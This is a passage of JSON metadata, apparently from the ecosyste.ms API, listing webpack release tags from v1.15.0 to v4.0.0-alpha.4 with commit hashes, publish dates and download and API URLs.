8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.